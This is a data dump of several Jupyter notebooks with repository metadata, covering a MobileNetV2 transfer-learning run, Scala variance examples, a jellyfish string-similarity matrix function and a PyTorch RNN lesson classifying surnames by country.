block_9_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_9_project (Conv2D) (None, 8, 8, 64) 24576 block_9_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_9_project_BN (BatchNormal (None, 8, 8, 64) 256 block_9_project[0][0] \n__________________________________________________________________________________________________\nblock_9_add (Add) (None, 8, 8, 64) 0 block_8_add[0][0] \n block_9_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_expand (Conv2D) (None, 8, 8, 384) 24576 block_9_add[0][0] \n__________________________________________________________________________________________________\nblock_10_expand_BN (BatchNormal (None, 8, 8, 384) 1536 block_10_expand[0][0] \n__________________________________________________________________________________________________\nblock_10_expand_relu (ReLU) (None, 8, 8, 384) 0 block_10_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise (DepthwiseCo (None, 8, 8, 384) 3456 block_10_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise_BN (BatchNor (None, 8, 8, 384) 1536 block_10_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_10_depthwise_relu (ReLU) (None, 8, 8, 384) 0 block_10_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_10_project (Conv2D) (None, 8, 
8, 96) 36864 block_10_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_10_project_BN (BatchNorma (None, 8, 8, 96) 384 block_10_project[0][0] \n__________________________________________________________________________________________________\nblock_11_expand (Conv2D) (None, 8, 8, 576) 55296 block_10_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_11_expand[0][0] \n__________________________________________________________________________________________________\nblock_11_expand_relu (ReLU) (None, 8, 8, 576) 0 block_11_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise (DepthwiseCo (None, 8, 8, 576) 5184 block_11_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise_BN (BatchNor (None, 8, 8, 576) 2304 block_11_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_11_depthwise_relu (ReLU) (None, 8, 8, 576) 0 block_11_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_11_project (Conv2D) (None, 8, 8, 96) 55296 block_11_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_11_project_BN (BatchNorma (None, 8, 8, 96) 384 block_11_project[0][0] \n__________________________________________________________________________________________________\nblock_11_add (Add) (None, 8, 8, 96) 0 block_10_project_BN[0][0] \n block_11_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_expand (Conv2D) (None, 8, 8, 576) 55296 block_11_add[0][0] \n__________________________________________________________________________________________________\nblock_12_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_12_expand[0][0] \n__________________________________________________________________________________________________\nblock_12_expand_relu (ReLU) (None, 8, 8, 576) 0 block_12_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise (DepthwiseCo (None, 8, 8, 576) 5184 block_12_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise_BN (BatchNor (None, 8, 8, 576) 2304 block_12_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_12_depthwise_relu (ReLU) (None, 8, 8, 576) 0 block_12_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_12_project (Conv2D) (None, 8, 8, 96) 55296 block_12_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_12_project_BN (BatchNorma (None, 8, 8, 96) 384 block_12_project[0][0] \n__________________________________________________________________________________________________\nblock_12_add (Add) (None, 8, 8, 96) 0 block_11_add[0][0] \n block_12_project_BN[0][0] 
\n__________________________________________________________________________________________________\nblock_13_expand (Conv2D) (None, 8, 8, 576) 55296 block_12_add[0][0] \n__________________________________________________________________________________________________\nblock_13_expand_BN (BatchNormal (None, 8, 8, 576) 2304 block_13_expand[0][0] \n__________________________________________________________________________________________________\nblock_13_expand_relu (ReLU) (None, 8, 8, 576) 0 block_13_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_13_pad (ZeroPadding2D) (None, 9, 9, 576) 0 block_13_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise (DepthwiseCo (None, 4, 4, 576) 5184 block_13_pad[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise_BN (BatchNor (None, 4, 4, 576) 2304 block_13_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_13_depthwise_relu (ReLU) (None, 4, 4, 576) 0 block_13_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_13_project (Conv2D) (None, 4, 4, 160) 92160 block_13_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_13_project_BN (BatchNorma (None, 4, 4, 160) 640 block_13_project[0][0] \n__________________________________________________________________________________________________\nblock_14_expand (Conv2D) (None, 4, 4, 960) 153600 block_13_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_expand_BN (BatchNormal (None, 4, 4, 960) 3840 block_14_expand[0][0] \n__________________________________________________________________________________________________\nblock_14_expand_relu (ReLU) (None, 4, 4, 960) 0 block_14_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_14_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_14_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_14_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_14_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_14_project (Conv2D) (None, 4, 4, 160) 153600 block_14_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_14_project_BN (BatchNorma (None, 4, 4, 160) 640 block_14_project[0][0] \n__________________________________________________________________________________________________\nblock_14_add (Add) (None, 4, 4, 160) 0 block_13_project_BN[0][0] \n block_14_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_expand (Conv2D) (None, 4, 4, 960) 153600 block_14_add[0][0] \n__________________________________________________________________________________________________\nblock_15_expand_BN (BatchNormal (None, 4, 
4, 960) 3840 block_15_expand[0][0] \n__________________________________________________________________________________________________\nblock_15_expand_relu (ReLU) (None, 4, 4, 960) 0 block_15_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_15_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_15_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_15_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_15_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_15_project (Conv2D) (None, 4, 4, 160) 153600 block_15_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_15_project_BN (BatchNorma (None, 4, 4, 160) 640 block_15_project[0][0] \n__________________________________________________________________________________________________\nblock_15_add (Add) (None, 4, 4, 160) 0 block_14_add[0][0] \n block_15_project_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_expand (Conv2D) (None, 4, 4, 960) 153600 block_15_add[0][0] \n__________________________________________________________________________________________________\nblock_16_expand_BN (BatchNormal (None, 4, 4, 960) 3840 block_16_expand[0][0] \n__________________________________________________________________________________________________\nblock_16_expand_relu (ReLU) (None, 4, 4, 960) 0 block_16_expand_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise (DepthwiseCo (None, 4, 4, 960) 8640 block_16_expand_relu[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise_BN (BatchNor (None, 4, 4, 960) 3840 block_16_depthwise[0][0] \n__________________________________________________________________________________________________\nblock_16_depthwise_relu (ReLU) (None, 4, 4, 960) 0 block_16_depthwise_BN[0][0] \n__________________________________________________________________________________________________\nblock_16_project (Conv2D) (None, 4, 4, 320) 307200 block_16_depthwise_relu[0][0] \n__________________________________________________________________________________________________\nblock_16_project_BN (BatchNorma (None, 4, 4, 320) 1280 block_16_project[0][0] \n__________________________________________________________________________________________________\nConv_1 (Conv2D) (None, 4, 4, 1280) 409600 block_16_project_BN[0][0] \n__________________________________________________________________________________________________\nConv_1_bn (BatchNormalization) (None, 4, 4, 1280) 5120 Conv_1[0][0] \n__________________________________________________________________________________________________\nout_relu (ReLU) (None, 4, 4, 1280) 0 Conv_1_bn[0][0] \n==================================================================================================\nTotal params: 2,257,984\nTrainable params: 0\nNon-trainable params: 2,257,984\n__________________________________________________________________________________________________\n"
],
[
"global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\nfeature_batch_average = global_average_layer(feature_batch)\nprint(feature_batch_average.shape)",
"(32, 1280)\n"
],
[
"prediction_layer = tf.keras.layers.Dense(10, activation='softmax')\nprediction_batch = prediction_layer(feature_batch_average)\nprint(prediction_batch.shape)",
"(32, 10)\n"
],
[
"# prediction_model = tf.keras.models.Sequential()\n# prediction_model.add(tf.keras.layers.Flatten())\n# prediction_model.add(tf.keras.layers.Dense(64, activation='relu'))\n# prediction_model.add(tf.keras.layers.Dense(10, activation='softmax'))",
"_____no_output_____"
],
[
"model = tf.keras.Sequential([\n base_model,\n global_average_layer,\n prediction_layer\n])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nmobilenetv2_1.00_128 (Model) (None, 4, 4, 1280) 2257984 \n_________________________________________________________________\nglobal_average_pooling2d (Gl (None, 1280) 0 \n_________________________________________________________________\ndense (Dense) (None, 10) 12810 \n=================================================================\nTotal params: 2,270,794\nTrainable params: 12,810\nNon-trainable params: 2,257,984\n_________________________________________________________________\n"
],
[
"model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])",
"_____no_output_____"
],
[
"model.summary()",
"Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nmobilenetv2_1.00_128 (Model) (None, 4, 4, 1280) 2257984 \n_________________________________________________________________\nglobal_average_pooling2d (Gl (None, 1280) 0 \n_________________________________________________________________\ndense (Dense) (None, 10) 12810 \n=================================================================\nTotal params: 2,270,794\nTrainable params: 12,810\nNon-trainable params: 2,257,984\n_________________________________________________________________\n"
],
[
"num_train, num_val, num_test = (\n metadata.splits['train'].num_examples*weight/10\n for weight in SPLIT_WEIGHTS\n)",
"_____no_output_____"
],
[
"initial_epochs = 10\nsteps_per_epoch = round(num_train)//BATCH_SIZE\nvalidation_steps = 20\n\nloss0,accuracy0 = model.evaluate(validation_batches, steps = validation_steps)",
"20/20 [==============================] - 9s 430ms/step - loss: 2.8450 - accuracy: 0.0891\n"
],
[
"print(\"initial loss: {:.2f}\".format(loss0))\nprint(\"initial accuracy: {:.2f}\".format(accuracy0))",
"initial loss: 2.85\ninitial accuracy: 0.09\n"
],
[
"history = model.fit(train_batches,\n epochs=initial_epochs,\n validation_data=validation_batches)",
"Epoch 1/10\n1250/1250 [==============================] - 906s 724ms/step - loss: 0.7841 - accuracy: 0.7360 - val_loss: 3.3938 - val_accuracy: 0.0956\nEpoch 2/10\n1250/1250 [==============================] - 899s 719ms/step - loss: 0.6249 - accuracy: 0.7876 - val_loss: 3.1788 - val_accuracy: 0.1108\nEpoch 3/10\n1250/1250 [==============================] - 895s 716ms/step - loss: 0.5995 - accuracy: 0.7943 - val_loss: 3.1835 - val_accuracy: 0.1248\nEpoch 4/10\n1250/1250 [==============================] - 924s 740ms/step - loss: 0.5877 - accuracy: 0.7996 - val_loss: 3.6165 - val_accuracy: 0.1230\nEpoch 5/10\n1250/1250 [==============================] - 926s 741ms/step - loss: 0.5757 - accuracy: 0.8047 - val_loss: 3.8792 - val_accuracy: 0.1148\nEpoch 6/10\n1250/1250 [==============================] - 927s 741ms/step - loss: 0.5783 - accuracy: 0.8051 - val_loss: 4.1246 - val_accuracy: 0.1078\nEpoch 7/10\n1250/1250 [==============================] - 930s 744ms/step - loss: 0.5686 - accuracy: 0.8062 - val_loss: 4.2597 - val_accuracy: 0.1094\nEpoch 8/10\n1250/1250 [==============================] - 950s 760ms/step - loss: 0.5651 - accuracy: 0.8087 - val_loss: 3.4582 - val_accuracy: 0.1250\nEpoch 9/10\n1250/1250 [==============================] - 936s 749ms/step - loss: 0.5715 - accuracy: 0.8058 - val_loss: 4.0509 - val_accuracy: 0.1094\nEpoch 10/10\n1250/1250 [==============================] - 939s 751ms/step - loss: 0.5623 - accuracy: 0.8083 - val_loss: 3.8432 - val_accuracy: 0.1246\n"
],
[
"acc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nplt.figure(figsize=(8, 8))\nplt.subplot(2, 1, 1)\nplt.plot(acc, label='Training Accuracy')\nplt.plot(val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.ylabel('Accuracy')\nplt.ylim([min(plt.ylim()),1])\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(2, 1, 2)\nplt.plot(loss, label='Training Loss')\nplt.plot(val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.ylabel('Cross Entropy')\nplt.ylim([0,1.0])\nplt.title('Training and Validation Loss')\nplt.xlabel('epoch')\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb039fb4195788c7835f4b15aee3729e082b2368 | 5,997 | ipynb | Jupyter Notebook | scala/Covariance-and-contravariance.ipynb | ashishpatel26/learning | b9e9472a70841061d2e755659872c8b093124f89 | [
"MIT"
] | 54 | 2017-09-10T17:28:21.000Z | 2021-12-17T14:55:04.000Z | scala/Covariance-and-contravariance.ipynb | parvathirajan/learning | bb112015d4513414bf86c7392c12b13f8d0fdd21 | [
"MIT"
] | 1 | 2019-07-04T21:57:14.000Z | 2019-07-04T21:57:14.000Z | scala/Covariance-and-contravariance.ipynb | parvathirajan/learning | bb112015d4513414bf86c7392c12b13f8d0fdd21 | [
"MIT"
] | 36 | 2017-11-13T16:54:58.000Z | 2022-02-07T11:20:20.000Z | 19.857616 | 119 | 0.50025 | [
[
[
"### Covariance",
"_____no_output_____"
]
],
[
[
"sealed trait MyOption[A]\ncase class MySome[A](get: A) extends MyOption[A]\ncase class MyNone[A]() extends MyOption[A]",
"_____no_output_____"
],
[
"def f(a: MyOption[Any]) = a",
"_____no_output_____"
],
[
"f(MySome[Any](1))",
"_____no_output_____"
],
[
"f(MySome[Int](1))",
"_____no_output_____"
],
[
"sealed trait MyOption2[+A]\ncase class MySome2[A](get: A) extends MyOption2[A]\ncase class MyNone2[A]() extends MyOption2[A]",
"_____no_output_____"
],
[
"def f(a: MyOption2[Any]) = a",
"_____no_output_____"
],
[
"f(MySome2[Int](1))",
"_____no_output_____"
]
],
[
[
"### Contravariance",
"_____no_output_____"
]
],
[
[
"def toS(a: Any) = a.toString",
"_____no_output_____"
],
[
"toS(List(1,2,3))",
"_____no_output_____"
],
[
"def f(a: String => String, s: String) = a(s)",
"_____no_output_____"
],
[
"// This works even though f is String => String\nf(toS, \"abc\")",
"_____no_output_____"
]
],
[
[
"To understand why take a look at [Function1](http://scala-lang.org/files/archive/api/2.11.8/#scala.Function1):\n```\ntrait Function1[-T1, +R] extends AnyRef\n```\n\nwhich is contravariant in input.",
"_____no_output_____"
],
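For readers more familiar with Python, the same rule shows up in `typing.Callable`: a function that accepts any `Animal` can be used wherever a `Callable[[Dog], str]` is expected, mirroring how `toS: Any => String` was accepted above. A minimal hedged sketch (class names invented for illustration):

```python
from typing import Callable

class Animal:
    pass

class Dog(Animal):
    pass

def describe_any(a: Animal) -> str:
    # Accepts any Animal, so it also satisfies Callable[[Dog], str]:
    # function parameter types are contravariant.
    return f"some {type(a).__name__}"

def apply_to_dog(f: Callable[[Dog], str], dog: Dog) -> str:
    return f(dog)

print(apply_to_dog(describe_any, Dog()))  # -> "some Dog"
```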
[
"#### Acknowledgement\nThanks to [@deaktator](https://github.com/deaktator) for explaining these to me",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
cb03b5ccccb32096aef98353af88ae854c56f645 | 3,596 | ipynb | Jupyter Notebook | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | Analyse/Recon.ipynb | Ammeister/Dachstein_RA | cb16a2d51bd09c2686a6d65950440947ffa68fbe | [
"MIT"
] | null | null | null | 34.576923 | 166 | 0.496941 | [
[
[
"import pandas as pd\nimport numpy as np\nimport jellyfish",
"_____no_output_____"
],
[
"def SimiDistMatrix(Input, Output, colindex, algo):\n \"\"\"\n SimiDistMatrix nécessite les modules pandas, numpy et jellyfish.\n SimiDistMatrix est une fonction qui compare une colonne de string avec elle même crée une matrice de similarité ou de distance selon l'algorythme choisi.\n Input : str, chemin relatif du fichier d'entrée.\n Output : str, chemin relatif du fichier de sortie.\n colindex : int, index de la colonne à tester.\n algo : str, algorythme à tester (levenshtein_distance, damerau_levenshtein_distance, hamming_distance, jaro_similarity, jaro_winkler_similarity)\n \"\"\"\n with open (Input, 'r', encoding='utf-8') as file :\n df = pd.read_csv(file)\n df = df.fillna('')\n df['tocompare'] = df['nom'].dropna() + df['prenom'].dropna()\n\n\n LsList = []\n\n for row in df.itertuples():\n ArrayList = []\n\n #print(row)\n for col in df.columns[colindex:]:\n value1 = getattr(row, col)\n for row in df.itertuples():\n for col in df.columns[colindex:]:\n value2 = getattr(row, col)\n \n if algo == 'levenshtein_distance' :\n similarity = jellyfish.levenshtein_distance(value1, value2)\n \n if algo == 'damerau_levenshtein_distance' :\n similarity = jellyfish.damerau_levenshtein_distance(value1, value2)\n \n if algo == 'hamming_distance' :\n similarity = jellyfish.hamming_distance(value1, value2)\n \n if algo == 'jaro_similarity' :\n similarity = jellyfish.jaro_similarity(value1, value2)\n \n if algo == 'jaro_winkler_similarity' :\n similarity = jellyfish.jaro_winkler_similarity(value1, value2)\n \n ArrayList.append(similarity)\n LsList.append(ArrayList)\n\n df2 = pd.DataFrame(LsList, columns = df['id'].tolist(), index = df['id'].tolist())\n \n sortie = Output + algo + '.csv'\n \n df2.to_csv(sortie)",
"_____no_output_____"
],
[
"SimiDistMatrix('./Data/OccConst.csv', './Data/LargeData/', 17, 'jaro_winkler_similarity')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb03b829ac9d6fb47c631aeb5b41d7e5eed02ea1 | 248,276 | ipynb | Jupyter Notebook | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | lessons/lesson13_RNN_classification.ipynb | elcolie/practice-pytorch | d83331e9ba3c8ac64a7ca4f76a2883e66b5c170c | [
"MIT"
] | null | null | null | 202.839869 | 157,036 | 0.901199 | [
[
[
"# README\nDo not blindly copy and paste. The parameter is hard-fixed with the `dataset`.<br>\nFor example: `SEQUENCE_LENGTH`",
"_____no_output_____"
]
],
[
[
"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pandas as pd\nfrom torch.utils.data import Dataset, DataLoader\nfrom tqdm import tqdm_notebook as tqdm\nfrom sampler import ImbalancedDatasetSampler\n\ntorch.manual_seed(1249583)\n\n# See the details in `Dataset` section\nSEQUENCE_LENGTH = 19\nCOUNTRY_LENGTH = 18\n",
"_____no_output_____"
]
],
[
[
"# Data Preparation",
"_____no_output_____"
],
[
"<img src='lesson13_data.png'>",
"_____no_output_____"
]
],
[
[
"def str2ascii_arr(name):\n \"\"\"\n 0-255\n \"\"\"\n arr = [ord(c) for c in name]\n return arr, len(arr)",
"_____no_output_____"
],
[
"class RNNClassifier(nn.Module):\n def __init__(self, input_size=256, hidden_size=256, output_size=18, n_layers=1):\n \"\"\"\n Because word embedding is working with ascii. It has to use `input_size=256, hidden_size=256`\n \"\"\"\n super().__init__()\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n \n # input_size 256, hidden_size 256.\n # https://python-reference.readthedocs.io/en/latest/docs/str/ASCII.html\n # Embedding should be (128, 300) not (256, 256). However I am not going to improve lesson.\n # I am going to improve an Exercise 13\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.gru = nn.GRU(hidden_size, hidden_size, n_layers)\n self.fc = nn.Linear(hidden_size, output_size)\n \n def forward(self, input):\n \"\"\"\n Do not remove `print`. Leave it be a historical footprint for I myself in the future\n \"\"\"\n \n # Sung Kim run this all at once (over the whole input sequence)\n # input = B x S . size(0) = B\n batch_size = input.size(0)\n \n # input: B x S -- (transpose) --> S x B\n input = input.t()\n \n # Embedding S x B -> S x B x I (embedding size)\n # print(f\" input size: {input.size()}\")\n embedded = self.embedding(input)\n embedded = embedded.clone().detach() # Make new tensor because of `EmbeddingGrad`\n # print(f\" embeddding size: {embedded.size()}\")\n \n # Make a hidden\n hidden = self._init_hidden(batch_size)\n output, hidden = self.gru(embedded, hidden)\n # print(f\" gru hidden output: {hidden.size()}\")\n \n # Use last layer output as FC's input\n # No need to unpack, since we are going to use hidden\n fc_output = self.fc(hidden)\n # print(f\" fc output: {fc_output.size()}\")\n return fc_output\n \n def _init_hidden(self, batch_size):\n hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return hidden.clone().detach()",
"_____no_output_____"
],
[
"# in torch.Size([1, 6]) 'adylov'\n# out torch.Size([1, 1, 18]) 18 countries",
"_____no_output_____"
]
],
[
[
"# Zero padding",
"_____no_output_____"
],
[
"<img src='zero_padding.png'>",
"_____no_output_____"
]
],
[
[
"def pad_sequences(vectorized_seqs, seq_lengths):\n \"\"\"\n Let the `SEQUENCE_LENGTH` is 19. According to the dataset\n \"\"\"\n seq_tensor = torch.zeros((len(vectorized_seqs), SEQUENCE_LENGTH), dtype=torch.long)\n for idx, (seq, seq_len) in enumerate(zip(vectorized_seqs, seq_lengths)):\n seq_tensor[idx, :seq_len] = torch.tensor(seq, dtype=torch.long)\n return seq_tensor",
"_____no_output_____"
],
[
"def make_variables(names):\n names = [i.lower() for i in names] # Let them be a lowercase()\n sequence_and_length = [str2ascii_arr(name) for name in names]\n vectorized_seqs = [sl[0] for sl in sequence_and_length]\n seq_lengths = torch.tensor([sl[1] for sl in sequence_and_length])\n return pad_sequences(vectorized_seqs, seq_lengths)",
"_____no_output_____"
],
[
"make_variables(['az', 'ab '])",
"_____no_output_____"
],
[
"classifier = RNNClassifier()\narr, _ = str2ascii_arr('adylov')\ninp = torch.tensor([arr], dtype=torch.long)\nout = classifier(inp)\nprint(f\"\\nin: {inp.size()}, \\nout: {out.size()}\")",
"\nin: torch.Size([1, 6]), \nout: torch.Size([1, 1, 18])\n"
],
[
"names = ['adylov', 'solan', 'hard', 'san']\nclassifier = RNNClassifier()\ninputs = make_variables(names)\nout = classifier(inputs)\nprint(f\"\\nbatch in: {inputs.size()}, \\nbatch out: {out.size()}\")",
"\nbatch in: torch.Size([4, 19]), \nbatch out: torch.Size([1, 4, 18])\n"
]
],
[
[
"# Utilities",
"_____no_output_____"
]
],
[
[
"import itertools\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n print(cm)\n plt.figure(figsize=(10, 10))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\ndef train(model, device, train_loader, optimizer, epoch, criterion):\n \"\"\"\n This function has one line different from the ordinary `train()` function\n It has `make_variables()` to convert tuple of names to be a tensor\n \"\"\"\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n\n # Do not forget to convert the tuple of string to a tensor\n data = make_variables(data)\n \n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n tmp = output.view(-1, COUNTRY_LENGTH)\n loss = criterion(tmp, target)\n loss.backward()\n optimizer.step()\n if batch_idx % 1000 == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item()))\n\ndef test(model, device, test_loader, criterion):\n model.eval()\n test_loss = 0\n correct = 0\n y_test = []\n y_pred = []\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n data = make_variables(data)\n data, target = data.to(device), target.to(device)\n output = model(data)\n tmp = output.view(-1, COUNTRY_LENGTH)\n \n test_loss += criterion(tmp, target).item() # sum up batch loss\n pred = tmp.max(1, keepdim=True)[1] # get the index of the max log-probability\n\n pred_tmp = pred.view(-1)\n pred_list = pred_tmp.tolist()\n target_list = target.tolist()\n \n y_test += target_list\n y_pred += pred_list\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n \n # Confusion matrix\n confusion_mtx = confusion_matrix(y_test, y_pred)\n plot_confusion_matrix(confusion_mtx, classes=countries, normalize=True,\n title='Confusion matrix')\n",
"_____no_output_____"
]
],
[
[
"# Dataset",
"_____no_output_____"
]
],
[
[
"trainset = pd.read_csv('names_train.csv', header=None)\ntestset = pd.read_csv('names_test.csv', header=None) ",
"_____no_output_____"
],
[
"headers = ['name', 'country']\ntrainset.columns = headers\ntestset.columns = headers",
"_____no_output_____"
],
[
"countries = sorted(list(trainset.country.drop_duplicates()))",
"_____no_output_____"
],
[
"country_counting = trainset.country.value_counts()",
"_____no_output_____"
],
[
"country_counting",
"_____no_output_____"
],
[
"counting_df = pd.DataFrame(country_counting)",
"_____no_output_____"
],
[
"counting_df.loc['Russian']['country']",
"_____no_output_____"
],
[
"counting_df['ratio'] = (counting_df.country.sum())/counting_df['country']",
"_____no_output_____"
]
],
[
[
"Use at `CrossEntropy` weights",
"_____no_output_____"
]
],
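[
[
"# Hedged sketch (added, not part of the original notebook): turn the per-country `ratio` column computed above\n# into class weights for nn.CrossEntropyLoss, ordered to match the label indices (`countries` is sorted).\n# `class_weights` and `weighted_criterion` are illustrative names.\nclass_weights = torch.tensor([counting_df.loc[c]['ratio'] for c in countries], dtype=torch.float)\nweighted_criterion = nn.CrossEntropyLoss(weight=class_weights)",
"_____no_output_____"
]
],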
[
[
"counting_df.country.sum()",
"_____no_output_____"
],
[
"counting_df",
"_____no_output_____"
],
[
"test_counting = testset.country.value_counts()\ntest_counting",
"_____no_output_____"
],
[
"# Majority of dataset is `Russian`\ntrainset.country.value_counts().plot.pie()",
"_____no_output_____"
],
[
"# So as trainset\ntestset.country.value_counts().plot.pie()",
"_____no_output_____"
],
[
"trainset.iloc[0]['country']",
"_____no_output_____"
]
],
[
[
"# Find the longest name in the dataset",
"_____no_output_____"
]
],
[
[
"result = pd.concat([trainset, testset])",
"_____no_output_____"
],
[
"result['name_length'] = result.name.apply(lambda x: len(x))",
"_____no_output_____"
]
],
[
[
"## Longest name is 19 chars\n19 is the `sequence_length`",
"_____no_output_____"
]
],
[
[
"result['name_length'].max(), result['name_length'].idxmax()",
"_____no_output_____"
],
[
"result.iloc[7925]",
"_____no_output_____"
],
[
"class NameDataSet(Dataset):\n def __init__(self, filename='names_train.csv'):\n trainset = pd.read_csv(filename, header=None)\n trainset.columns = ['name', 'country']\n countries = sorted(list(trainset.country.drop_duplicates()))\n\n self.trainset = trainset\n self.countries = countries\n self.len = len(trainset) \n\n def __getitem__(self, index):\n country = self.trainset.iloc[index]['country']\n return self.trainset.iloc[index]['name'], self.countries.index(country)\n\n def __len__(self):\n return self.len\n ",
"_____no_output_____"
],
[
"train_dataset = NameDataSet()\ntest_dataset = NameDataSet('names_test.csv')",
"_____no_output_____"
],
[
"train_dataset.countries.index('Czech')",
"_____no_output_____"
],
[
"%%time\ntrain_loader = DataLoader(dataset=train_dataset, sampler=ImbalancedDatasetSampler(train_dataset), batch_size=2, num_workers=2) # 2 * 9 * 743 \ntest_loader = DataLoader(dataset=test_dataset, sampler=ImbalancedDatasetSampler(test_dataset), batch_size=2, num_workers=2) # 4 * 25 * 67\n",
"CPU times: user 8.87 s, sys: 0 ns, total: 8.87 s\nWall time: 8.88 s\n"
]
],
[
[
"# 1. Model",
"_____no_output_____"
]
],
[
[
"model = RNNClassifier()",
"_____no_output_____"
]
],
[
[
"# 2. Criterion & Loss",
"_____no_output_____"
]
],
[
[
